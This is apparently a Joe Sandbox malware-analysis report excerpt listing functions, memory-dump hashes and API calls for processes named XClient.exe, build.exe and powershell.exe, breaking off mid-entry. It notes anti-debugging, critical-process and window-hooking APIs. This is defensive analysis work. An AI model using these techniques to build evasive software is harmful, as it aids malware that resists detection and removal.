Function 00007FF886E209F7 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2121ea88a4bb49861ff4c3387fbb258f98b51606a39440f4a1dadc1f3ee5e9
Instruction ID: b42370397aaa228e28319153f36f65e896b00275424add8286f813a4faa5becd
Opcode Fuzzy Hash: ae2121ea88a4bb49861ff4c3387fbb258f98b51606a39440f4a1dadc1f3ee5e9
Instruction Fuzzy Hash: BA716270A189198FEB98EB68D458BAD7BE2FF59354F204179E01AD72D5CF38AC41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E20498 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 543e68f85b6e382acc052762624a945f07dbcb64ecb318d2d29105e9caf8417d
Instruction ID: 214fcf387567952e5fed448b61e42ea040a0a80bdfd288bf00e454ba2cf8b7bb
Opcode Fuzzy Hash: 543e68f85b6e382acc052762624a945f07dbcb64ecb318d2d29105e9caf8417d
Instruction Fuzzy Hash: BE218C31F1894D4FEBC4EB6888A97B973E2FB99745B04007AE40ED3292DE68AC018741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E20951 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4c4260d3aef65d4f21ad899c0e8edcc30b29557e6b052b7819543476befe11
Instruction ID: d69f329bf8d3c63a177fcc25e2aa3637b7754c7fd12c428ae93defc5f7d44413
Opcode Fuzzy Hash: ea4c4260d3aef65d4f21ad899c0e8edcc30b29557e6b052b7819543476befe11
Instruction Fuzzy Hash: 6511CE70C04A498FEB44DF64C44A6EEBBF1FF59314F21416AE006E7292DF39A846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E20E71 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c9c3fc2aa4deda546499bd65df2b3c3f7eff4c3ccdd20d84ee73ea7bcea194
Instruction ID: 042132f686d88867cb79526837843389455a4b814f9122fe9722a0d746d37918
Opcode Fuzzy Hash: 83c9c3fc2aa4deda546499bd65df2b3c3f7eff4c3ccdd20d84ee73ea7bcea194
Instruction Fuzzy Hash: C7012120A1DA994FD768E728D8A16A873E2FF88650F100079D449C73C2DF2CEC828782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E204A8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bef0d65f24e9e1dfc1867b180e8f3d535733e45d6a9af8d7d85f0ec3020cbfb
Instruction ID: 9f815875f41ec6a051e067dd887d780364b92bf3dfa710f98c08b918aeb1f194
Opcode Fuzzy Hash: 0bef0d65f24e9e1dfc1867b180e8f3d535733e45d6a9af8d7d85f0ec3020cbfb
Instruction Fuzzy Hash: F1F0F420A2D55A4BD758A678985167973D2FF88750F200579E00EC3382CE2CA8818782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E204B0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a0c9704c64d27e88818364ee4ee58a3cc55aa6249d619292380ded2d4f0f6a
Instruction ID: 631a809316de1d5857f43e86f73341ba2f71205955a6af7e69a88d721078832b
Opcode Fuzzy Hash: 80a0c9704c64d27e88818364ee4ee58a3cc55aa6249d619292380ded2d4f0f6a
Instruction Fuzzy Hash: 90F0FF30B2891A4BDA68E728985466D73D6FF88750F600439E00EC3381DF2CAC828782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E20F3F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b066055153db3a04f536962426acfc936af77d18c6aa053124a68ff8c3289410
Instruction ID: 6fac6d1264c263110c62560eb7a2d5bb55943761f9ab407edc9aba912adcd610
Opcode Fuzzy Hash: b066055153db3a04f536962426acfc936af77d18c6aa053124a68ff8c3289410
Instruction Fuzzy Hash: 5FE08611F189090BF69865AC68652B8A3C2FB98650F604035E00DC23C3DD1D9C828241

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E203C8 Relevance: 10.1, Strings: 8, Instructions: 83COMMON

Download Yara Rule

Strings

P/, xrefs: 00007FF886E20419
8,, xrefs: 00007FF886E20429
/, xrefs: 00007FF886E203E9
dS^I, xrefs: 00007FF886E20424
H1, xrefs: 00007FF886E203C9
-, xrefs: 00007FF886E20469
\S^I, xrefs: 00007FF886E20434
(0, xrefs: 00007FF886E20449

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID: (0$8,$H1$P/$\S^I$dS^I$-$/
API String ID: 0-4261789501
Opcode ID: 6860e83cd07084e35a9378efa8bb6aab8208a3d219d85ebb3a84a126129366a2
Instruction ID: b713ad13a34af9f3c69c2715d5c6fd36738e76bcef4fa8157c618f16ecf60747
Opcode Fuzzy Hash: 6860e83cd07084e35a9378efa8bb6aab8208a3d219d85ebb3a84a126129366a2
Instruction Fuzzy Hash: E121FC52C0E6C15FE3075A786C551B92FA2BF62648BAC40FBD0885B2EFED55DD0AC341

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: XClient.exePID: 7468, Parent PID: 7392COMMON

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF886E49899 Relevance: 4.3, Strings: 2, Instructions: 1798
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 00007FF886E4ACB3
CAM_^, xrefs: 00007FF886E4AA61

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID: 6$CAM_^
API String ID: 0-2259320755
Opcode ID: 280a615fcd53e9cfd21f96f6b0ce641dcaa0475eca335b97cc677fefc4a9a56f
Instruction ID: 00aa4adefa4505af72bdb46527fd9fc39d7bc5579ebb951821adfee56dfdf31d
Opcode Fuzzy Hash: 280a615fcd53e9cfd21f96f6b0ce641dcaa0475eca335b97cc677fefc4a9a56f
Instruction Fuzzy Hash: 34D2A270A28A098FEB54EB6CC89977DB7E2FF98754F10457DD40DD3291DE38A8818B42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E49943 Relevance: 3.9, Strings: 2, Instructions: 1410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAM_^, xrefs: 00007FF886E4AA61
B, xrefs: 00007FF886E4AA3D

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID: B$CAM_^
API String ID: 0-2030590545
Opcode ID: 20209c51279a53620fd5ee5cf10d9286ada04e7a9571c5d3e8ce8d40e05ba6c3
Instruction ID: 16b8eba56374e2a767b7698f57724056c9c2a558829e7a117ec33f9a5982df3a
Opcode Fuzzy Hash: 20209c51279a53620fd5ee5cf10d9286ada04e7a9571c5d3e8ce8d40e05ba6c3
Instruction Fuzzy Hash: D7A29370A18A098FEB58EB6CC8997BDB7E2FF98754F54417DD00DD3292DE38A8418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E41779 Relevance: 2.1, Strings: 1, Instructions: 883
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAM_^, xrefs: 00007FF886E41A8C

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID: CAM_^
API String ID: 0-3136481660
Opcode ID: 34a66b344ad57f2b5234eed91a484022c27c422a435642d83f78f10a6c5cdb68
Instruction ID: 782e529c54fa62d50fb2b1b0a31c5464e273369194ae5182a0f0a4be5f34e363
Opcode Fuzzy Hash: 34a66b344ad57f2b5234eed91a484022c27c422a435642d83f78f10a6c5cdb68
Instruction Fuzzy Hash: 6252B360B68A0A4FEB94E77C94697B9B7D2FF99780F50057DD40EC3292DD28AC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E47BE1 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF886E47C90

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 8b83786368f0a80d2b9be854981635dc7e6cf64b1e342a26a3b525d45f841297
Instruction ID: 43ff61de5a60ab8afbcaab70c219e4d5ab98f497cdd5bd32052861341cfab226
Opcode Fuzzy Hash: 8b83786368f0a80d2b9be854981635dc7e6cf64b1e342a26a3b525d45f841297
Instruction Fuzzy Hash: 533102319087588FDB58DF98888A7E97BE0FF65321F14416AD489D7282DB34A846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E4C680 Relevance: 1.0, Instructions: 994COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8226679c9661dba16f5a78650b52ba5c186dd2d10f845380008f03f2247548ec
Instruction ID: 4529c4110eea74fbe548a49c598a946473ed7e22c308c8d0307ccb7fd401f38a
Opcode Fuzzy Hash: 8226679c9661dba16f5a78650b52ba5c186dd2d10f845380008f03f2247548ec
Instruction Fuzzy Hash: 0A626B71B5C90A4BEB94FB7888997B962D2FF99380B604578D41ED32C6DE2CAC42C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E46636 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546015c3caf8db6a9bf4af28485aa1ef20184c025dc455a369e746b6913bdb50
Instruction ID: c463988edf814fe12964ddb2a9d8880db45735c1c0167e0510c89f221b85a2d8
Opcode Fuzzy Hash: 546015c3caf8db6a9bf4af28485aa1ef20184c025dc455a369e746b6913bdb50
Instruction Fuzzy Hash: B5F1B530918A8D8FEBA8DF28C855BE937E1FF54350F14426ED84DC7291DB389945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E473E2 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916c637a3000f34f01eb444b2a840d0b69edd3691fb5a5143b894f4f30963c60
Instruction ID: 14742088c3b2896cedb69a336644a7f9a0aa2b279ad59eec29ea0c52f5c808e8
Opcode Fuzzy Hash: 916c637a3000f34f01eb444b2a840d0b69edd3691fb5a5143b894f4f30963c60
Instruction Fuzzy Hash: 49E1B230918A8E8FEFA8DF28C8557E937E1FF54350F14426AD84DC7291DA78A945CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E42501 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4023264a244200420f255be1a5795891a803c921cdf4606ab190c98997b79ab6
Instruction ID: 3ffe1aabaf8353c2edba4fbdf6575bfb53e2ef8681b4eff03c6a49bad0bfd755
Opcode Fuzzy Hash: 4023264a244200420f255be1a5795891a803c921cdf4606ab190c98997b79ab6
Instruction Fuzzy Hash: 32C16E20F5CD494FEB98EB78846637D76D2FF98784F14417AD44EC3292DE28AC428742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E42261 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4994b825b1d525dccdc8f72f4a3b6fdb2149ec462309538153f6f2380fa1f950
Instruction ID: 5920e55ea14813876e08aba098d60071f2549c5d3dd6193d829a171c9f840b09
Opcode Fuzzy Hash: 4994b825b1d525dccdc8f72f4a3b6fdb2149ec462309538153f6f2380fa1f950
Instruction Fuzzy Hash: F5511020A6DAC94FD786ABB848653757FE0EF87255B1800FAE08DCB293DD085C46C346

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E4B0BD Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF886E4B192

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: bc05fda7c76f45cb52b084361b9994945629952ca69709b329bcd4a5e81471ea
Instruction ID: 84841621edc290b63d9c31b6eb8cb9cd958e3c77282687a0ad76ab03b73094ca
Opcode Fuzzy Hash: bc05fda7c76f45cb52b084361b9994945629952ca69709b329bcd4a5e81471ea
Instruction Fuzzy Hash: B841053180C7588FDB19DFA8D855BE97BF0FF56311F04416EE08AC3692CB686846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E4B878 Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF886E4B941

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6597be295edc93d1df7005f40a65de3c1f60407828ea9566ee157eeb0685ae85
Instruction ID: 0e45286f92e7e2390832217306d42f63cbaec8313f79ae8682ebe63ed5e75120
Opcode Fuzzy Hash: 6597be295edc93d1df7005f40a65de3c1f60407828ea9566ee157eeb0685ae85
Instruction Fuzzy Hash: 2731F731A1CA5D4FDB18EB6C98466F9BBE1FF69321F14423ED049C3292CA64A816C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E4968A Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF886E4B941

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6f166f1df2894da1abe9c7754ecc192a17385f54a18513681aab60de3f23e216
Instruction ID: 0514d0d05a21d606aa5c66c0c45b97d179ff6f72a1ce1e697b9094b6ba1792fa
Opcode Fuzzy Hash: 6f166f1df2894da1abe9c7754ecc192a17385f54a18513681aab60de3f23e216
Instruction Fuzzy Hash: F0319231A1CE1D8FDB58EB6C98466B9B7E1FB69311F10423ED00AD3252CA65A8568BC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E495EA Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF886E4B192

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 551f01da8dfff46b01f39a63da2e69b1354e152f789fed0e290e0aeab9990a54
Instruction ID: 710ff83d8052dbd88f9752b92111a23577e6f79c39e23dd6d3ab7137b4774b61
Opcode Fuzzy Hash: 551f01da8dfff46b01f39a63da2e69b1354e152f789fed0e290e0aeab9990a54
Instruction Fuzzy Hash: 8E31D431908A188FDB28DF9CD8457F97BE0FF55311F14412EE09AD3682DB746846CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E410C5 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2640405158.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886e40000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d09c6a1001e286833c282316ff19879d0dd76ca8987cb47175612cb2ba09012
Instruction ID: 058d5092571786720db18da731f6c4ae8a277b0491fc25cf84abc2bd83867478
Opcode Fuzzy Hash: 4d09c6a1001e286833c282316ff19879d0dd76ca8987cb47175612cb2ba09012
Instruction Fuzzy Hash: AA41B567A1D57A56DB113AFD78552FA6B10EFA33B5B0882B3D58CCE083CC0C244A86D6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: build.exePID: 7492, Parent PID: 7392COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 024B0CE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 024B0D47

Strings

1Ip, xrefs: 024B0CFF

Memory Dump Source

Source File: 00000003.00000002.2585314635.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_24b0000_build.jbxd

Similarity

API ID: ConsoleWindow
String ID: 1Ip
API String ID: 2863861424-1786185241
Opcode ID: faca264addfac97bb8675d1925bffe2032731216aa1774f4af1dc5466a7c3b8d
Instruction ID: d507bb2633ff7c003a8886984a90f739af751c16f3357f50efa1ad4826acae91
Opcode Fuzzy Hash: faca264addfac97bb8675d1925bffe2032731216aa1774f4af1dc5466a7c3b8d
Instruction Fuzzy Hash: 9A1158719003498FDB20CFAAC4457EFBBF4EF88214F24842AC459A7250C7B56545CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 024B0CE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 024B0D47

Strings

1Ip, xrefs: 024B0CFF

Memory Dump Source

Source File: 00000003.00000002.2585314635.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_24b0000_build.jbxd

Similarity

API ID: ConsoleWindow
String ID: 1Ip
API String ID: 2863861424-1786185241
Opcode ID: c3f1d3b8e5c8cb821efc11665116b8c38bc353288f83a4149f9be16d2f86a5ac
Instruction ID: 66d4bcdf4f253c359235a133dea9ffe9251615b564f6a0adbb9927a27e1939e3
Opcode Fuzzy Hash: c3f1d3b8e5c8cb821efc11665116b8c38bc353288f83a4149f9be16d2f86a5ac
Instruction Fuzzy Hash: 431106B19043498FDB20DFAAC4457EFFBF4EF48214F24842AC559A7250CBB5A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7668, Parent PID: 7468COMMON

Executed Functions

Function 00007FF886E59757 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

X, xrefs: 00007FF886E59786

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 6e158f5cbc1c88cc51ffea7b146f7c751a648476ac57a8e5e73442e2f8cdba94
Instruction ID: 50b44ca1a5e6a4391bc22a323213117df0e34d36c457f7f51c62537e6389d286
Opcode Fuzzy Hash: 6e158f5cbc1c88cc51ffea7b146f7c751a648476ac57a8e5e73442e2f8cdba94
Instruction Fuzzy Hash: BD31FB7191CB884FDB589B5CA80A6F977E1FBA5310F10412FE449D3292DA34A816CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F26605 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1422169564.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed37f14bc8acb04740a83b5491f2d60b2652db86b69ae3132569f50b717b2b15
Instruction ID: bbc0f34c751656ff53517ebbc9b3c8aadabeb3e2997ab1392eb4dd36c1ac2934
Opcode Fuzzy Hash: ed37f14bc8acb04740a83b5491f2d60b2652db86b69ae3132569f50b717b2b15
Instruction Fuzzy Hash: EED13331D0DA8E4FE7A59B6868559B57BE0FF4A391B1801BED44CCB283DD18DC05C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E5B3F8 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eaa8e57f25f45ea24e1fab2fa704ff4e6a185482f453659b442e4db05cdd199
Instruction ID: 1506281a12f917c8a89921fb554d7e505d4f2135e36e5098190eb839236038b5
Opcode Fuzzy Hash: 6eaa8e57f25f45ea24e1fab2fa704ff4e6a185482f453659b442e4db05cdd199
Instruction Fuzzy Hash: AEB14770A1CB488FE749EF18C8996B5BBE2FF95350F10017ED08AC7297DA65E846CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E5A025 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b724fe1b1a4090b9e38d3eb38f23fbd7a1de830381deacf50f4a467f7c8d6d6
Instruction ID: da20487fce6ebcd90d14285c56b67a0463942ee9e0b5a8600a5ccb32944730a7
Opcode Fuzzy Hash: 9b724fe1b1a4090b9e38d3eb38f23fbd7a1de830381deacf50f4a467f7c8d6d6
Instruction Fuzzy Hash: 5F415E7191D6C34FD312AB6898651E47FA0AF13298B0A45F3D09CCB0A3EE5C6C5AC792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886D3E620 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1421107581.00007FF886D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886d3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9e0e057e7dbd1dc2fd12272bea2e67460fef52e8f5ea3697420b2199b891d6
Instruction ID: b8d7f529769b8cce556e883b6d9e2ffda5db848f9a25ef907227cb9d16d809de
Opcode Fuzzy Hash: ea9e0e057e7dbd1dc2fd12272bea2e67460fef52e8f5ea3697420b2199b891d6
Instruction Fuzzy Hash: 1841367080DBC54FE3569B29A8459523FF0FF52360B1505EFD089CB1A3D625AC46C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1421636913.00007FF886E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 8fed615b1388ffade34361fc6f194f5b0f8d7e22f9ece29554544b5277bb025b
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: EE01677111CB0C4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3661DA36E882CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F2414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1422169564.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84339934045f965f202e3cfd9c3fcbca1036b810bca5df9203fb71891c3be0ed
Instruction ID: daead38277f23ce01bd6d26bc68be286c3b7e803292752abccbe824bb210279b
Opcode Fuzzy Hash: 84339934045f965f202e3cfd9c3fcbca1036b810bca5df9203fb71891c3be0ed
Instruction Fuzzy Hash: CBF0BE32A0C9098FE659EB4CF4408A877E0FF5836071100BAE01DC72A3DA29EC91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F24400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1422169564.00007FF886F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
